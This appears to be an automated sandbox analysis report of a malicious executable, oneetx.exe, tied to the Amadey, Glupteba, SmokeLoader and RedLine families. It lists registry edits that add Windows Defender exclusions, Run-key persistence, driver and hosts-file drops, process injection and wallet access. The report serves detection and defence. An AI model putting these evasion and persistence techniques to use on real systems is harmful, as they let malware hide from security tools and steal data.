Analysis Overview
SHA256
563acabe49cc451e9caac20fae780bad27ea09aaefaaf8a1dfd838a00de97144
Threat Level: Known bad
The file oneetx.exe was found to be: Known bad.
Malicious Activity Summary
Amadey
Glupteba
Glupteba payload
GCleaner
SmokeLoader
RedLine
Amadey family
Suspicious use of NtCreateUserProcessOtherParentProcess
Windows security bypass
Modifies boot configuration data using bcdedit
Stops running service(s)
Downloads MZ/PE file
Possible attempt to disable PatchGuard
Drops file in Drivers directory
Modifies Windows Firewall
Loads dropped DLL
Executes dropped EXE
UPX packed file
Windows security modification
Checks computer location settings
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
Checks installed software on the system
Manipulates WinMonFS driver.
Manipulates WinMon driver.
Drops file in System32 directory
Suspicious use of SetThreadContext
Launches sc.exe
Drops file in Windows directory
Drops file in Program Files directory
Checks for VirtualBox DLLs, possible anti-VM trick
Unsigned PE
Program crash
Enumerates physical storage devices
Suspicious use of FindShellTrayWindow
Uses Task Scheduler COM API
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
Modifies system certificate store
Modifies data under HKEY_USERS
Suspicious behavior: MapViewOfSection
Creates scheduled task(s)
Kills process with taskkill
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: LoadsDriver
Suspicious behavior: GetForegroundWindowSpam
Checks SCSI registry key(s)
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2023-07-02 00:14
Signatures
Amadey family
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2023-07-02 00:14
Reported
2023-07-02 00:17
Platform
win7-20230621-en
Max time kernel
144s
Max time network
154s
Command Line
Signatures
Amadey
GCleaner
Glupteba
Glupteba payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
RedLine
SmokeLoader
Suspicious use of NtCreateUserProcessOtherParentProcess
Windows security bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" | C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" | C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" | C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\3eef203fb515bda85f514e168abb5973.exe = "0" | C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" | C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" | C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" | C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe | N/A |
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
Downloads MZ/PE file
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe | N/A |
| File created | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe | N/A |
| File created | C:\Windows\system32\drivers\Winmon.sys | C:\Windows\rss\csrss.exe | N/A |
| File created | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe | N/A |
| File created | C:\Windows\System32\drivers\etc\hosts | C:\Program Files\Google\Chrome\updater.exe | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Possible attempt to disable PatchGuard
Stops running service(s)
Executes dropped EXE
Loads dropped DLL
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Windows security modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" | C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" | C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" | C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" | C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" | C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" | C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\3eef203fb515bda85f514e168abb5973.exe = "0" | C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3518257231-2980324860-1431329550-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" | C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3518257231-2980324860-1431329550-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" | C:\Windows\rss\csrss.exe | N/A |
Checks installed software on the system
Manipulates WinMon driver.
| Description | Indicator | Process | Target |
| File opened for modification | \??\WinMon | C:\Windows\rss\csrss.exe | N/A |
Manipulates WinMonFS driver.
| Description | Indicator | Process | Target |
| File opened for modification | \??\WinMonFS | C:\Windows\rss\csrss.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 624 set thread context of 108 | N/A | C:\Users\Admin\AppData\Local\Temp\1000202001\toolspub2.exe | C:\Users\Admin\AppData\Local\Temp\1000202001\toolspub2.exe |
| PID 948 set thread context of 1732 | N/A | C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
| PID 924 set thread context of 1676 | N/A | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
| PID 1248 set thread context of 956 | N/A | C:\Windows\system32\schtasks.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
| PID 2764 set thread context of 2212 | N/A | C:\Program Files\Google\Chrome\updater.exe | C:\Windows\System32\conhost.exe |
| PID 2764 set thread context of 2240 | N/A | C:\Program Files\Google\Chrome\updater.exe | C:\Windows\explorer.exe |
Checks for VirtualBox DLLs, possible anti-VM trick
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\VBoxMiniRdrDN | C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files\Google\Chrome\updater.exe | C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe | N/A |
| File created | C:\Program Files\Google\Chrome\updater.exe | C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe | N/A |
| File created | C:\Program Files\Google\Chrome\updater.exe | C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe | N/A |
| File created | C:\Program Files\Google\Libs\WR64.sys | C:\Program Files\Google\Chrome\updater.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\windefender.exe | C:\Windows\rss\csrss.exe | N/A |
| File created | C:\Windows\Logs\CBS\CbsPersist_20230702001509.cab | C:\Windows\system32\makecab.exe | N/A |
| File opened for modification | C:\Windows\rss | C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe | N/A |
| File created | C:\Windows\rss\csrss.exe | C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe | N/A |
| File created | C:\Windows\windefender.exe | C:\Windows\rss\csrss.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
Enumerates physical storage devices
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\1000202001\toolspub2.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\1000202001\toolspub2.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\1000202001\toolspub2.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-242 = "Samoa Standard Time" | C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-511 = "Central Asia Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-251 = "Dateline Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-532 = "Sri Lanka Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-571 = "China Daylight Time" | C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-192 = "Mountain Standard Time" | C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-662 = "Cen. Australia Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-141 = "Canada Central Daylight Time" | C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-591 = "Malay Peninsula Daylight Time" | C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-631 = "Tokyo Daylight Time" | C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-201 = "US Mountain Daylight Time" | C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-622 = "Korea Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-211 = "Pacific Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-122 = "SA Pacific Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-331 = "E. Europe Daylight Time" | C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-441 = "Arabian Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-162 = "Central Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-471 = "Ekaterinburg Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-351 = "FLE Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-982 = "Kamchatka Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1021 = "Bangladesh Daylight Time" | C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-871 = "Pakistan Daylight Time" | C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-221 = "Alaskan Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-331 = "E. Europe Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-435 = "Georgian Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-181 = "Mountain Daylight Time (Mexico)" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-582 = "North Asia East Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-121 = "SA Pacific Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1022 = "Bangladesh Standard Time" | C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-531 = "Sri Lanka Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-241 = "Samoa Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-262 = "GMT Standard Time" | C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1042 = "Ulaanbaatar Standard Time" | C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-104 = "Central Brazilian Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-692 = "Tasmania Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-651 = "AUS Central Daylight Time" | C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-365 = "Middle East Standard Time" | C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-82 = "Atlantic Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-31 = "Mid-Atlantic Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-962 = "Paraguay Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-381 = "South Africa Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-931 = "Coordinated Universal Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-652 = "AUS Central Standard Time" | C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-52 = "Greenland Standard Time" | C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-3 = "Microsoft Corporation" | C:\Windows\system32\netsh.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-581 = "North Asia East Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-151 = "Central America Daylight Time" | C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-341 = "Egypt Daylight Time" | C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-892 = "Morocco Standard Time" | C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-541 = "Myanmar Daylight Time" | C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-391 = "Arab Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-449 = "Azerbaijan Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-721 = "Central Pacific Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-682 = "E. Australia Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-402 = "Arabic Standard Time" | C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-212 = "Pacific Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-591 = "Malay Peninsula Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-751 = "Tonga Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-52 = "Greenland Standard Time" | C:\Windows\windefender.exe | N/A |
